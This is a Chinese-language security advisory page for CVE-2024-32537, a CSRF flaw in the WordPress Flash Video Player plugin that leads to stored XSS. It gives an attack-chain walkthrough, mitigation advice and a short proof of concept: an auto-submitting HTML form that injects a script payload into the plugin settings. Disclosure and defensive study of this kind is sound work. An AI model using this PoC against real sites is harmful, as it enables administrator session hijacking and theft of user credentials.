CVE-2024-32537 CVSS 7.1 高危

CVE-2024-32537 Flash Video Player CSRF漏洞

披露日期: 2026-03-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2024-32537

漏洞类型

跨站请求伪造 (CSRF)

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Flash Video Player

漏洞概述

Flash Video Player插件存在跨站请求伪造（CSRF）漏洞，影响5.0.4及之前版本。该漏洞允许攻击者诱导已登录的管理员执行非预期操作，进而导致存储型跨站脚本攻击（XSS）。攻击者可利用此漏洞窃取敏感信息或接管管理员会话，对网站安全构成严重威胁。

技术细节

该漏洞源于插件在处理关键配置更新请求时，未实施有效的CSRF令牌验证机制。攻击者可以构造恶意的HTML页面或URL，诱导拥有管理员权限的用户在已登录状态下进行访问。由于浏览器会自动携带认证Cookie，服务器端会误认为该请求是管理员本人的合法操作。攻击者利用此漏洞可注入恶意JavaScript代码（XSS payload）到插件设置中。当其他用户访问受影响的前端页面时，恶意脚本将被执行，从而导致账户劫持或数据窃取。

攻击链分析

STEP 1

诱导访问

攻击者构造包含恶意CSRF请求的HTML页面，并发送给目标网站的管理员。

STEP 2

发送请求

管理员在浏览器已登录状态下访问恶意页面，浏览器自动携带Session Cookie向插件接口发送请求。

STEP 3

执行操作

服务器由于缺少CSRF token校验，误以为是管理员合法操作，执行了修改配置的命令。

STEP 4

注入Payload

恶意脚本被注入到插件配置中并保存到数据库，形成存储型XSS。

STEP 5

触发攻击

当管理员或普通用户访问包含该播放器的页面时，恶意脚本加载执行，窃取凭证。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for CSRF to XSS in Flash Video Player -->
<!-- Requires admin to be logged in -->
<html>
  <body>
    <form action="http://target-site/wp-admin/admin.php?page=flash-video-player-settings" method="POST">
      <input type="hidden" name="action" value="update" />
      <input type="hidden" name="player_param" value="<script>alert(document.cookie)</script>" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

影响范围

Flash Video Player <= 5.0.4

防御指南

临时缓解措施

建议立即检查并更新插件版本。在无法立即更新的情况下，应限制管理员账户的浏览行为，避免点击不明链接，并部署Web应用防火墙（WAF）以拦截包含恶意脚本参数的请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表